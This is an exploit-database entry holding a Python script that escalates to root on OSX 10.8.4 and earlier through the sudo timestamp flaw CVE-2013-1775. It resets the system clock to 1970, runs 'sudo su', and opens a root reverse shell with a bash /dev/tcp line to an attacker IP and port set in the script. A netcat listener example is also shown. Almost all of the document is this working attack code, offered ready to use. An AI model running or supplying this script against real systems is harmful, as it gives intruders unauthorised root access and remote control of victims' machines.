OSX <= 10.8.4 - Local Root Priv Escalation (py)
| EKU-ID: 3467 | CVE: 2013-1775 | OSVDB-ID: 90677 |
| Author: ReL1K | Published: 2013-09-02 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 3467 | CVE: 2013-1775 | OSVDB-ID: 90677 |
| Author: ReL1K | Published: 2013-09-02 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/python # Original MSF Module: ################################################################################################### # Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # Date: 08-27-2013 # Exploit Author: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # Tested On: OSX 10.8.4 # # Reference: http://1337day.com/exploit/description/21166 # # Example below: # trustedsec:Desktop Dave$ python osx_esc.py # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444 # # attacker_box:~ Dave$ nc -l 4444 # bash: no job control in this shell # bash-3.2# ################################################################################################### import subprocess # IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1" # PORT for REVERSE SHELL - change this to your attacker port address port = "4444" # drop into a root shell - replace 192.168.1.1 with the reverse listener proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)) print """ ############################################################### # # OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell # # Written by: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # # Reference: http://1337day.com/exploit/description/21166 ############################################################### """print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)